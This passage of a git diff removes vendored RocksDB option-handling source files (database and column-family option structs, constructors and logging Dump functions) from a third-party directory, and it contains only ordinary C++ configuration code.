-        max_successive_merges(0),
-        inplace_update_num_locks(0),
-        disable_auto_compactions(false),
-        soft_pending_compaction_bytes_limit(0),
-        hard_pending_compaction_bytes_limit(0),
-        level0_file_num_compaction_trigger(0),
-        level0_slowdown_writes_trigger(0),
-        level0_stop_writes_trigger(0),
-        max_compaction_bytes(0),
-        target_file_size_base(0),
-        target_file_size_multiplier(0),
-        max_bytes_for_level_base(0),
-        max_bytes_for_level_multiplier(0),
-        max_sequential_skip_in_iterations(0),
-        paranoid_file_checks(false),
-        report_bg_io_stats(false),
-        compression(Snappy_Supported() ? kSnappyCompression : kNoCompression) {}
-
-  // Must be called after any change to MutableCFOptions
-  void RefreshDerivedOptions(int num_levels, CompactionStyle compaction_style);
-
-  void RefreshDerivedOptions(const ImmutableCFOptions& ioptions) {
-    RefreshDerivedOptions(ioptions.num_levels, ioptions.compaction_style);
-  }
-
-  // Get the max file size in a given level.
-  uint64_t MaxFileSizeForLevel(int level) const;
-  int MaxBytesMultiplerAdditional(int level) const {
-    if (level >=
-        static_cast<int>(max_bytes_for_level_multiplier_additional.size())) {
-      return 1;
-    }
-    return max_bytes_for_level_multiplier_additional[level];
-  }
-
-  void Dump(Logger* log) const;
-
-  // Memtable related options
-  size_t write_buffer_size;
-  int max_write_buffer_number;
-  size_t arena_block_size;
-  double memtable_prefix_bloom_size_ratio;
-  size_t memtable_huge_page_size;
-  size_t max_successive_merges;
-  size_t inplace_update_num_locks;
-
-  // Compaction related options
-  bool disable_auto_compactions;
-  uint64_t soft_pending_compaction_bytes_limit;
-  uint64_t hard_pending_compaction_bytes_limit;
-  int level0_file_num_compaction_trigger;
-  int level0_slowdown_writes_trigger;
-  int level0_stop_writes_trigger;
-  uint64_t max_compaction_bytes;
-  uint64_t target_file_size_base;
-  int target_file_size_multiplier;
-  uint64_t max_bytes_for_level_base;
-  double max_bytes_for_level_multiplier;
-  std::vector<int> max_bytes_for_level_multiplier_additional;
-
-  // Misc options
-  uint64_t max_sequential_skip_in_iterations;
-  bool paranoid_file_checks;
-  bool report_bg_io_stats;
-  CompressionType compression;
-
-  // Derived options
-  // Per-level target file size.
-  std::vector<uint64_t> max_file_size;
-};
-
-uint64_t MultiplyCheckOverflow(uint64_t op1, double op2);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/db_options.cc b/thirdparty/rocksdb/options/db_options.cc
deleted file mode 100644
index 6177575..0000000
--- a/thirdparty/rocksdb/options/db_options.cc
+++ /dev/null
@@ -1,275 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "options/db_options.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-
-#include "port/port.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/env.h"
-#include "rocksdb/sst_file_manager.h"
-#include "rocksdb/wal_filter.h"
-#include "util/logging.h"
-
-namespace rocksdb {
-
-ImmutableDBOptions::ImmutableDBOptions() : ImmutableDBOptions(Options()) {}
-
-ImmutableDBOptions::ImmutableDBOptions(const DBOptions& options)
-    : create_if_missing(options.create_if_missing),
-      create_missing_column_families(options.create_missing_column_families),
-      error_if_exists(options.error_if_exists),
-      paranoid_checks(options.paranoid_checks),
-      env(options.env),
-      rate_limiter(options.rate_limiter),
-      sst_file_manager(options.sst_file_manager),
-      info_log(options.info_log),
-      info_log_level(options.info_log_level),
-      max_file_opening_threads(options.max_file_opening_threads),
-      statistics(options.statistics),
-      use_fsync(options.use_fsync),
-      db_paths(options.db_paths),
-      db_log_dir(options.db_log_dir),
-      wal_dir(options.wal_dir),
-      max_subcompactions(options.max_subcompactions),
-      max_background_flushes(options.max_background_flushes),
-      max_log_file_size(options.max_log_file_size),
-      log_file_time_to_roll(options.log_file_time_to_roll),
-      keep_log_file_num(options.keep_log_file_num),
-      recycle_log_file_num(options.recycle_log_file_num),
-      max_manifest_file_size(options.max_manifest_file_size),
-      table_cache_numshardbits(options.table_cache_numshardbits),
-      wal_ttl_seconds(options.WAL_ttl_seconds),
-      wal_size_limit_mb(options.WAL_size_limit_MB),
-      manifest_preallocation_size(options.manifest_preallocation_size),
-      allow_mmap_reads(options.allow_mmap_reads),
-      allow_mmap_writes(options.allow_mmap_writes),
-      use_direct_reads(options.use_direct_reads),
-      use_direct_io_for_flush_and_compaction(
-          options.use_direct_io_for_flush_and_compaction),
-      allow_fallocate(options.allow_fallocate),
-      is_fd_close_on_exec(options.is_fd_close_on_exec),
-      advise_random_on_open(options.advise_random_on_open),
-      db_write_buffer_size(options.db_write_buffer_size),
-      write_buffer_manager(options.write_buffer_manager),
-      access_hint_on_compaction_start(options.access_hint_on_compaction_start),
-      new_table_reader_for_compaction_inputs(
-          options.new_table_reader_for_compaction_inputs),
-      compaction_readahead_size(options.compaction_readahead_size),
-      random_access_max_buffer_size(options.random_access_max_buffer_size),
-      writable_file_max_buffer_size(options.writable_file_max_buffer_size),
-      use_adaptive_mutex(options.use_adaptive_mutex),
-      bytes_per_sync(options.bytes_per_sync),
-      wal_bytes_per_sync(options.wal_bytes_per_sync),
-      listeners(options.listeners),
-      enable_thread_tracking(options.enable_thread_tracking),
-      enable_pipelined_write(options.enable_pipelined_write),
-      allow_concurrent_memtable_write(options.allow_concurrent_memtable_write),
-      enable_write_thread_adaptive_yield(
-          options.enable_write_thread_adaptive_yield),
-      write_thread_max_yield_usec(options.write_thread_max_yield_usec),
-      write_thread_slow_yield_usec(options.write_thread_slow_yield_usec),
-      skip_stats_update_on_db_open(options.skip_stats_update_on_db_open),
-      wal_recovery_mode(options.wal_recovery_mode),
-      allow_2pc(options.allow_2pc),
-      row_cache(options.row_cache),
-#ifndef ROCKSDB_LITE
-      wal_filter(options.wal_filter),
-#endif  // ROCKSDB_LITE
-      fail_if_options_file_error(options.fail_if_options_file_error),
-      dump_malloc_stats(options.dump_malloc_stats),
-      avoid_flush_during_recovery(options.avoid_flush_during_recovery),
-      allow_ingest_behind(options.allow_ingest_behind),
-      concurrent_prepare(options.concurrent_prepare),
-      manual_wal_flush(options.manual_wal_flush) {
-}
-
-void ImmutableDBOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "                        Options.error_if_exists: %d",
-                   error_if_exists);
-  ROCKS_LOG_HEADER(log, "                      Options.create_if_missing: %d",
-                   create_if_missing);
-  ROCKS_LOG_HEADER(log, "                        Options.paranoid_checks: %d",
-                   paranoid_checks);
-  ROCKS_LOG_HEADER(log, "                                    Options.env: %p",
-                   env);
-  ROCKS_LOG_HEADER(log, "                               Options.info_log: %p",
-                   info_log.get());
-  ROCKS_LOG_HEADER(log, "               Options.max_file_opening_threads: %d",
-                   max_file_opening_threads);
-  ROCKS_LOG_HEADER(log, "                              Options.use_fsync: %d",
-                   use_fsync);
-  ROCKS_LOG_HEADER(
-      log, "                      Options.max_log_file_size: %" ROCKSDB_PRIszt,
-      max_log_file_size);
-  ROCKS_LOG_HEADER(log,
-                   "                 Options.max_manifest_file_size: %" PRIu64,
-                   max_manifest_file_size);
-  ROCKS_LOG_HEADER(
-      log, "                  Options.log_file_time_to_roll: %" ROCKSDB_PRIszt,
-      log_file_time_to_roll);
-  ROCKS_LOG_HEADER(
-      log, "                      Options.keep_log_file_num: %" ROCKSDB_PRIszt,
-      keep_log_file_num);
-  ROCKS_LOG_HEADER(
-      log, "                   Options.recycle_log_file_num: %" ROCKSDB_PRIszt,
-      recycle_log_file_num);
-  ROCKS_LOG_HEADER(log, "                        Options.allow_fallocate: %d",
-                   allow_fallocate);
-  ROCKS_LOG_HEADER(log, "                       Options.allow_mmap_reads: %d",
-                   allow_mmap_reads);
-  ROCKS_LOG_HEADER(log, "                      Options.allow_mmap_writes: %d",
-                   allow_mmap_writes);
-  ROCKS_LOG_HEADER(log, "                       Options.use_direct_reads: %d",
-                   use_direct_reads);
-  ROCKS_LOG_HEADER(log,
-                   "                       "
-                   "Options.use_direct_io_for_flush_and_compaction: %d",
-                   use_direct_io_for_flush_and_compaction);
-  ROCKS_LOG_HEADER(log, "         Options.create_missing_column_families: %d",
-                   create_missing_column_families);
-  ROCKS_LOG_HEADER(log, "                             Options.db_log_dir: %s",
-                   db_log_dir.c_str());
-  ROCKS_LOG_HEADER(log, "                                Options.wal_dir: %s",
-                   wal_dir.c_str());
-  ROCKS_LOG_HEADER(log, "               Options.table_cache_numshardbits: %d",
-                   table_cache_numshardbits);
-  ROCKS_LOG_HEADER(log,
-                   "                     Options.max_subcompactions: %" PRIu32,
-                   max_subcompactions);
-  ROCKS_LOG_HEADER(log, "                 Options.max_background_flushes: %d",
-                   max_background_flushes);
-  ROCKS_LOG_HEADER(log,
-                   "                        Options.WAL_ttl_seconds: %" PRIu64,
-                   wal_ttl_seconds);
-  ROCKS_LOG_HEADER(log,
-                   "                      Options.WAL_size_limit_MB: %" PRIu64,
-                   wal_size_limit_mb);
-  ROCKS_LOG_HEADER(
-      log, "            Options.manifest_preallocation_size: %" ROCKSDB_PRIszt,
-      manifest_preallocation_size);
-  ROCKS_LOG_HEADER(log, "                    Options.is_fd_close_on_exec: %d",
-                   is_fd_close_on_exec);
-  ROCKS_LOG_HEADER(log, "                  Options.advise_random_on_open: %d",
-                   advise_random_on_open);
-  ROCKS_LOG_HEADER(
-      log, "                   Options.db_write_buffer_size: %" ROCKSDB_PRIszt,
-      db_write_buffer_size);
-  ROCKS_LOG_HEADER(log, "                   Options.write_buffer_manager: %p",
-                   write_buffer_manager.get());
-  ROCKS_LOG_HEADER(log, "        Options.access_hint_on_compaction_start: %d",
-                   static_cast<int>(access_hint_on_compaction_start));
-  ROCKS_LOG_HEADER(log, " Options.new_table_reader_for_compaction_inputs: %d",
-                   new_table_reader_for_compaction_inputs);
-  ROCKS_LOG_HEADER(
-      log, "              Options.compaction_readahead_size: %" ROCKSDB_PRIszt,
-      compaction_readahead_size);
-  ROCKS_LOG_HEADER(
-      log, "          Options.random_access_max_buffer_size: %" ROCKSDB_PRIszt,
-      random_access_max_buffer_size);
-  ROCKS_LOG_HEADER(
-      log, "          Options.writable_file_max_buffer_size: %" ROCKSDB_PRIszt,
-      writable_file_max_buffer_size);
-  ROCKS_LOG_HEADER(log, "                     Options.use_adaptive_mutex: %d",
-                   use_adaptive_mutex);
-  ROCKS_LOG_HEADER(log, "                           Options.rate_limiter: %p",
-                   rate_limiter.get());
-  Header(
-      log, "    Options.sst_file_manager.rate_bytes_per_sec: %" PRIi64,
-      sst_file_manager ? sst_file_manager->GetDeleteRateBytesPerSecond() : 0);
-  ROCKS_LOG_HEADER(log,
-                   "                         Options.bytes_per_sync: %" PRIu64,
-                   bytes_per_sync);
-  ROCKS_LOG_HEADER(log,
-                   "                     Options.wal_bytes_per_sync: %" PRIu64,
-                   wal_bytes_per_sync);
-  ROCKS_LOG_HEADER(log, "                      Options.wal_recovery_mode: %d",
-                   wal_recovery_mode);
-  ROCKS_LOG_HEADER(log, "                 Options.enable_thread_tracking: %d",
-                   enable_thread_tracking);
-  ROCKS_LOG_HEADER(log, "                 Options.enable_pipelined_write: %d",
-                   enable_pipelined_write);
-  ROCKS_LOG_HEADER(log, "        Options.allow_concurrent_memtable_write: %d",
-                   allow_concurrent_memtable_write);
-  ROCKS_LOG_HEADER(log, "     Options.enable_write_thread_adaptive_yield: %d",
-                   enable_write_thread_adaptive_yield);
-  ROCKS_LOG_HEADER(log,
-                   "            Options.write_thread_max_yield_usec: %" PRIu64,
-                   write_thread_max_yield_usec);
-  ROCKS_LOG_HEADER(log,
-                   "           Options.write_thread_slow_yield_usec: %" PRIu64,
-                   write_thread_slow_yield_usec);
-  if (row_cache) {
-    ROCKS_LOG_HEADER(
-        log, "                              Options.row_cache: %" PRIu64,
-        row_cache->GetCapacity());
-  } else {
-    ROCKS_LOG_HEADER(log,
-                     "                              Options.row_cache: None");
-  }
-#ifndef ROCKSDB_LITE
-  ROCKS_LOG_HEADER(log, "                             Options.wal_filter: %s",
-                   wal_filter ? wal_filter->Name() : "None");
-#endif  // ROCKDB_LITE
-
-  ROCKS_LOG_HEADER(log, "            Options.avoid_flush_during_recovery: %d",
-                   avoid_flush_during_recovery);
-  ROCKS_LOG_HEADER(log, "            Options.allow_ingest_behind: %d",
-                   allow_ingest_behind);
-  ROCKS_LOG_HEADER(log, "            Options.concurrent_prepare: %d",
-                   concurrent_prepare);
-  ROCKS_LOG_HEADER(log, "            Options.manual_wal_flush: %d",
-                   manual_wal_flush);
-}
-
-MutableDBOptions::MutableDBOptions()
-    : max_background_jobs(2),
-      base_background_compactions(-1),
-      max_background_compactions(-1),
-      avoid_flush_during_shutdown(false),
-      delayed_write_rate(2 * 1024U * 1024U),
-      max_total_wal_size(0),
-      delete_obsolete_files_period_micros(6ULL * 60 * 60 * 1000000),
-      stats_dump_period_sec(600),
-      max_open_files(-1) {}
-
-MutableDBOptions::MutableDBOptions(const DBOptions& options)
-    : max_background_jobs(options.max_background_jobs),
-      base_background_compactions(options.base_background_compactions),
-      max_background_compactions(options.max_background_compactions),
-      avoid_flush_during_shutdown(options.avoid_flush_during_shutdown),
-      delayed_write_rate(options.delayed_write_rate),
-      max_total_wal_size(options.max_total_wal_size),
-      delete_obsolete_files_period_micros(
-          options.delete_obsolete_files_period_micros),
-      stats_dump_period_sec(options.stats_dump_period_sec),
-      max_open_files(options.max_open_files) {}
-
-void MutableDBOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "            Options.max_background_jobs: %d",
-                   max_background_jobs);
-  ROCKS_LOG_HEADER(log, "            Options.max_background_compactions: %d",
-                   max_background_compactions);
-  ROCKS_LOG_HEADER(log, "            Options.avoid_flush_during_shutdown: %d",
-                   avoid_flush_during_shutdown);
-  ROCKS_LOG_HEADER(log, "            Options.delayed_write_rate : %" PRIu64,
-                   delayed_write_rate);
-  ROCKS_LOG_HEADER(log, "            Options.max_total_wal_size: %" PRIu64,
-                   max_total_wal_size);
-  ROCKS_LOG_HEADER(
-      log, "            Options.delete_obsolete_files_period_micros: %" PRIu64,
-      delete_obsolete_files_period_micros);
-  ROCKS_LOG_HEADER(log, "                  Options.stats_dump_period_sec: %u",
-                   stats_dump_period_sec);
-  ROCKS_LOG_HEADER(log, "                         Options.max_open_files: %d",
-                   max_open_files);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/db_options.h b/thirdparty/rocksdb/options/db_options.h
deleted file mode 100644
index 18d1a5f..0000000
--- a/thirdparty/rocksdb/options/db_options.h
+++ /dev/null
@@ -1,104 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <string>
-#include <vector>
-
-#include "rocksdb/options.h"
-
-namespace rocksdb {
-
-struct ImmutableDBOptions {
-  ImmutableDBOptions();
-  explicit ImmutableDBOptions(const DBOptions& options);
-
-  void Dump(Logger* log) const;
-
-  bool create_if_missing;
-  bool create_missing_column_families;
-  bool error_if_exists;
-  bool paranoid_checks;
-  Env* env;
-  std::shared_ptr<RateLimiter> rate_limiter;
-  std::shared_ptr<SstFileManager> sst_file_manager;
-  std::shared_ptr<Logger> info_log;
-  InfoLogLevel info_log_level;
-  int max_file_opening_threads;
-  std::shared_ptr<Statistics> statistics;
-  bool use_fsync;
-  std::vector<DbPath> db_paths;
-  std::string db_log_dir;
-  std::string wal_dir;
-  uint32_t max_subcompactions;
-  int max_background_flushes;
-  size_t max_log_file_size;
-  size_t log_file_time_to_roll;
-  size_t keep_log_file_num;
-  size_t recycle_log_file_num;
-  uint64_t max_manifest_file_size;
-  int table_cache_numshardbits;
-  uint64_t wal_ttl_seconds;
-  uint64_t wal_size_limit_mb;
-  size_t manifest_preallocation_size;
-  bool allow_mmap_reads;
-  bool allow_mmap_writes;
-  bool use_direct_reads;
-  bool use_direct_io_for_flush_and_compaction;
-  bool allow_fallocate;
-  bool is_fd_close_on_exec;
-  bool advise_random_on_open;
-  size_t db_write_buffer_size;
-  std::shared_ptr<WriteBufferManager> write_buffer_manager;
-  DBOptions::AccessHint access_hint_on_compaction_start;
-  bool new_table_reader_for_compaction_inputs;
-  size_t compaction_readahead_size;
-  size_t random_access_max_buffer_size;
-  size_t writable_file_max_buffer_size;
-  bool use_adaptive_mutex;
-  uint64_t bytes_per_sync;
-  uint64_t wal_bytes_per_sync;
-  std::vector<std::shared_ptr<EventListener>> listeners;
-  bool enable_thread_tracking;
-  bool enable_pipelined_write;
-  bool allow_concurrent_memtable_write;
-  bool enable_write_thread_adaptive_yield;
-  uint64_t write_thread_max_yield_usec;
-  uint64_t write_thread_slow_yield_usec;
-  bool skip_stats_update_on_db_open;
-  WALRecoveryMode wal_recovery_mode;
-  bool allow_2pc;
-  std::shared_ptr<Cache> row_cache;
-#ifndef ROCKSDB_LITE
-  WalFilter* wal_filter;
-#endif  // ROCKSDB_LITE
-  bool fail_if_options_file_error;
-  bool dump_malloc_stats;
-  bool avoid_flush_during_recovery;
-  bool allow_ingest_behind;
-  bool concurrent_prepare;
-  bool manual_wal_flush;
-};
-
-struct MutableDBOptions {
-  MutableDBOptions();
-  explicit MutableDBOptions(const MutableDBOptions& options) = default;
-  explicit MutableDBOptions(const DBOptions& options);
-
-  void Dump(Logger* log) const;
-
-  int max_background_jobs;
-  int base_background_compactions;
-  int max_background_compactions;
-  bool avoid_flush_during_shutdown;
-  uint64_t delayed_write_rate;
-  uint64_t max_total_wal_size;
-  uint64_t delete_obsolete_files_period_micros;
-  unsigned int stats_dump_period_sec;
-  int max_open_files;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options.cc b/thirdparty/rocksdb/options/options.cc
deleted file mode 100644
index 7bd2c95..0000000
--- a/thirdparty/rocksdb/options/options.cc
+++ /dev/null
@@ -1,636 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/options.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <limits>
-
-#include "monitoring/statistics.h"
-#include "options/db_options.h"
-#include "options/options_helper.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/sst_file_manager.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/wal_filter.h"
-#include "table/block_based_table_factory.h"
-#include "util/compression.h"
-
-namespace rocksdb {
-
-AdvancedColumnFamilyOptions::AdvancedColumnFamilyOptions() {
-  assert(memtable_factory.get() != nullptr);
-}
-
-AdvancedColumnFamilyOptions::AdvancedColumnFamilyOptions(const Options& options)
-    : max_write_buffer_number(options.max_write_buffer_number),
-      min_write_buffer_number_to_merge(
-          options.min_write_buffer_number_to_merge),
-      max_write_buffer_number_to_maintain(
-          options.max_write_buffer_number_to_maintain),
-      inplace_update_support(options.inplace_update_support),
-      inplace_update_num_locks(options.inplace_update_num_locks),
-      inplace_callback(options.inplace_callback),
-      memtable_prefix_bloom_size_ratio(
-          options.memtable_prefix_bloom_size_ratio),
-      memtable_huge_page_size(options.memtable_huge_page_size),
-      memtable_insert_with_hint_prefix_extractor(
-          options.memtable_insert_with_hint_prefix_extractor),
-      bloom_locality(options.bloom_locality),
-      arena_block_size(options.arena_block_size),
-      compression_per_level(options.compression_per_level),
-      num_levels(options.num_levels),
-      level0_slowdown_writes_trigger(options.level0_slowdown_writes_trigger),
-      level0_stop_writes_trigger(options.level0_stop_writes_trigger),
-      target_file_size_base(options.target_file_size_base),
-      target_file_size_multiplier(options.target_file_size_multiplier),
-      level_compaction_dynamic_level_bytes(
-          options.level_compaction_dynamic_level_bytes),
-      max_bytes_for_level_multiplier(options.max_bytes_for_level_multiplier),
-      max_bytes_for_level_multiplier_additional(
-          options.max_bytes_for_level_multiplier_additional),
-      max_compaction_bytes(options.max_compaction_bytes),
-      soft_pending_compaction_bytes_limit(
-          options.soft_pending_compaction_bytes_limit),
-      hard_pending_compaction_bytes_limit(
-          options.hard_pending_compaction_bytes_limit),
-      compaction_style(options.compaction_style),
-      compaction_pri(options.compaction_pri),
-      compaction_options_universal(options.compaction_options_universal),
-      compaction_options_fifo(options.compaction_options_fifo),
-      max_sequential_skip_in_iterations(
-          options.max_sequential_skip_in_iterations),
-      memtable_factory(options.memtable_factory),
-      table_properties_collector_factories(
-          options.table_properties_collector_factories),
-      max_successive_merges(options.max_successive_merges),
-      optimize_filters_for_hits(options.optimize_filters_for_hits),
-      paranoid_file_checks(options.paranoid_file_checks),
-      force_consistency_checks(options.force_consistency_checks),
-      report_bg_io_stats(options.report_bg_io_stats) {
-  assert(memtable_factory.get() != nullptr);
-  if (max_bytes_for_level_multiplier_additional.size() <
-      static_cast<unsigned int>(num_levels)) {
-    max_bytes_for_level_multiplier_additional.resize(num_levels, 1);
-  }
-}
-
-ColumnFamilyOptions::ColumnFamilyOptions()
-    : compression(Snappy_Supported() ? kSnappyCompression : kNoCompression),
-      table_factory(
-          std::shared_ptr<TableFactory>(new BlockBasedTableFactory())) {}
-
-ColumnFamilyOptions::ColumnFamilyOptions(const Options& options)
-    : AdvancedColumnFamilyOptions(options),
-      comparator(options.comparator),
-      merge_operator(options.merge_operator),
-      compaction_filter(options.compaction_filter),
-      compaction_filter_factory(options.compaction_filter_factory),
-      write_buffer_size(options.write_buffer_size),
-      compression(options.compression),
-      bottommost_compression(options.bottommost_compression),
-      compression_opts(options.compression_opts),
-      level0_file_num_compaction_trigger(
-          options.level0_file_num_compaction_trigger),
-      prefix_extractor(options.prefix_extractor),
-      max_bytes_for_level_base(options.max_bytes_for_level_base),
-      disable_auto_compactions(options.disable_auto_compactions),
-      table_factory(options.table_factory) {}
-
-DBOptions::DBOptions() {}
-
-DBOptions::DBOptions(const Options& options)
-    : create_if_missing(options.create_if_missing),
-      create_missing_column_families(options.create_missing_column_families),
-      error_if_exists(options.error_if_exists),
-      paranoid_checks(options.paranoid_checks),
-      env(options.env),
-      rate_limiter(options.rate_limiter),
-      sst_file_manager(options.sst_file_manager),
-      info_log(options.info_log),
-      info_log_level(options.info_log_level),
-      max_open_files(options.max_open_files),
-      max_file_opening_threads(options.max_file_opening_threads),
-      max_total_wal_size(options.max_total_wal_size),
-      statistics(options.statistics),
-      use_fsync(options.use_fsync),
-      db_paths(options.db_paths),
-      db_log_dir(options.db_log_dir),
-      wal_dir(options.wal_dir),
-      delete_obsolete_files_period_micros(
-          options.delete_obsolete_files_period_micros),
-      max_background_jobs(options.max_background_jobs),
-      base_background_compactions(options.base_background_compactions),
-      max_background_compactions(options.max_background_compactions),
-      max_subcompactions(options.max_subcompactions),
-      max_background_flushes(options.max_background_flushes),
-      max_log_file_size(options.max_log_file_size),
-      log_file_time_to_roll(options.log_file_time_to_roll),
-      keep_log_file_num(options.keep_log_file_num),
-      recycle_log_file_num(options.recycle_log_file_num),
-      max_manifest_file_size(options.max_manifest_file_size),
-      table_cache_numshardbits(options.table_cache_numshardbits),
-      WAL_ttl_seconds(options.WAL_ttl_seconds),
-      WAL_size_limit_MB(options.WAL_size_limit_MB),
-      manifest_preallocation_size(options.manifest_preallocation_size),
-      allow_mmap_reads(options.allow_mmap_reads),
-      allow_mmap_writes(options.allow_mmap_writes),
-      use_direct_reads(options.use_direct_reads),
-      use_direct_io_for_flush_and_compaction(
-          options.use_direct_io_for_flush_and_compaction),
-      allow_fallocate(options.allow_fallocate),
-      is_fd_close_on_exec(options.is_fd_close_on_exec),
-      skip_log_error_on_recovery(options.skip_log_error_on_recovery),
-      stats_dump_period_sec(options.stats_dump_period_sec),
-      advise_random_on_open(options.advise_random_on_open),
-      db_write_buffer_size(options.db_write_buffer_size),
-      write_buffer_manager(options.write_buffer_manager),
-      access_hint_on_compaction_start(options.access_hint_on_compaction_start),
-      new_table_reader_for_compaction_inputs(
-          options.new_table_reader_for_compaction_inputs),
-      compaction_readahead_size(options.compaction_readahead_size),
-      random_access_max_buffer_size(options.random_access_max_buffer_size),
-      writable_file_max_buffer_size(options.writable_file_max_buffer_size),
-      use_adaptive_mutex(options.use_adaptive_mutex),
-      bytes_per_sync(options.bytes_per_sync),
-      wal_bytes_per_sync(options.wal_bytes_per_sync),
-      listeners(options.listeners),
-      enable_thread_tracking(options.enable_thread_tracking),
-      delayed_write_rate(options.delayed_write_rate),
-      enable_pipelined_write(options.enable_pipelined_write),
-      allow_concurrent_memtable_write(options.allow_concurrent_memtable_write),
-      enable_write_thread_adaptive_yield(
-          options.enable_write_thread_adaptive_yield),
-      write_thread_max_yield_usec(options.write_thread_max_yield_usec),
-      write_thread_slow_yield_usec(options.write_thread_slow_yield_usec),
-      skip_stats_update_on_db_open(options.skip_stats_update_on_db_open),
-      wal_recovery_mode(options.wal_recovery_mode),
-      row_cache(options.row_cache),
-#ifndef ROCKSDB_LITE
-      wal_filter(options.wal_filter),
-#endif  // ROCKSDB_LITE
-      fail_if_options_file_error(options.fail_if_options_file_error),
-      dump_malloc_stats(options.dump_malloc_stats),
-      avoid_flush_during_recovery(options.avoid_flush_during_recovery),
-      avoid_flush_during_shutdown(options.avoid_flush_during_shutdown),
-      allow_ingest_behind(options.allow_ingest_behind) {
-}
-
-void DBOptions::Dump(Logger* log) const {
-    ImmutableDBOptions(*this).Dump(log);
-    MutableDBOptions(*this).Dump(log);
-}  // DBOptions::Dump
-
-void ColumnFamilyOptions::Dump(Logger* log) const {
-  ROCKS_LOG_HEADER(log, "              Options.comparator: %s",
-                   comparator->Name());
-  ROCKS_LOG_HEADER(log, "          Options.merge_operator: %s",
-                   merge_operator ? merge_operator->Name() : "None");
-  ROCKS_LOG_HEADER(log, "       Options.compaction_filter: %s",
-                   compaction_filter ? compaction_filter->Name() : "None");
-  ROCKS_LOG_HEADER(
-      log, "       Options.compaction_filter_factory: %s",
-      compaction_filter_factory ? compaction_filter_factory->Name() : "None");
-  ROCKS_LOG_HEADER(log, "        Options.memtable_factory: %s",
-                   memtable_factory->Name());
-  ROCKS_LOG_HEADER(log, "           Options.table_factory: %s",
-                   table_factory->Name());
-  ROCKS_LOG_HEADER(log, "           table_factory options: %s",
-                   table_factory->GetPrintableTableOptions().c_str());
-  ROCKS_LOG_HEADER(log, "       Options.write_buffer_size: %" ROCKSDB_PRIszt,
-                   write_buffer_size);
-  ROCKS_LOG_HEADER(log, " Options.max_write_buffer_number: %d",
-                   max_write_buffer_number);
-  if (!compression_per_level.empty()) {
-    for (unsigned int i = 0; i < compression_per_level.size(); i++) {
-      ROCKS_LOG_HEADER(
-          log, "       Options.compression[%d]: %s", i,
-          CompressionTypeToString(compression_per_level[i]).c_str());
-    }
-    } else {
-      ROCKS_LOG_HEADER(log, "         Options.compression: %s",
-                       CompressionTypeToString(compression).c_str());
-    }
-    ROCKS_LOG_HEADER(
-        log, "                 Options.bottommost_compression: %s",
-        bottommost_compression == kDisableCompressionOption
-            ? "Disabled"
-            : CompressionTypeToString(bottommost_compression).c_str());
-    ROCKS_LOG_HEADER(
-        log, "      Options.prefix_extractor: %s",
-        prefix_extractor == nullptr ? "nullptr" : prefix_extractor->Name());
-    ROCKS_LOG_HEADER(log,
-                     "  Options.memtable_insert_with_hint_prefix_extractor: %s",
-                     memtable_insert_with_hint_prefix_extractor == nullptr
-                         ? "nullptr"
-                         : memtable_insert_with_hint_prefix_extractor->Name());
-    ROCKS_LOG_HEADER(log, "            Options.num_levels: %d", num_levels);
-    ROCKS_LOG_HEADER(log, "       Options.min_write_buffer_number_to_merge: %d",
-                     min_write_buffer_number_to_merge);
-    ROCKS_LOG_HEADER(log, "    Options.max_write_buffer_number_to_maintain: %d",
-                     max_write_buffer_number_to_maintain);
-    ROCKS_LOG_HEADER(log, "           Options.compression_opts.window_bits: %d",
-                     compression_opts.window_bits);
-    ROCKS_LOG_HEADER(log, "                 Options.compression_opts.level: %d",
-                     compression_opts.level);
-    ROCKS_LOG_HEADER(log, "              Options.compression_opts.strategy: %d",
-                     compression_opts.strategy);
-    ROCKS_LOG_HEADER(
-        log,
-        "        Options.compression_opts.max_dict_bytes: %" ROCKSDB_PRIszt,
-        compression_opts.max_dict_bytes);
-    ROCKS_LOG_HEADER(log, "     Options.level0_file_num_compaction_trigger: %d",
-                     level0_file_num_compaction_trigger);
-    ROCKS_LOG_HEADER(log, "         Options.level0_slowdown_writes_trigger: %d",
-                     level0_slowdown_writes_trigger);
-    ROCKS_LOG_HEADER(log, "             Options.level0_stop_writes_trigger: %d",
-                     level0_stop_writes_trigger);
-    ROCKS_LOG_HEADER(
-        log, "                  Options.target_file_size_base: %" PRIu64,
-        target_file_size_base);
-    ROCKS_LOG_HEADER(log, "            Options.target_file_size_multiplier: %d",
-                     target_file_size_multiplier);
-    ROCKS_LOG_HEADER(
-        log, "               Options.max_bytes_for_level_base: %" PRIu64,
-        max_bytes_for_level_base);
-    ROCKS_LOG_HEADER(log, "Options.level_compaction_dynamic_level_bytes: %d",
-                     level_compaction_dynamic_level_bytes);
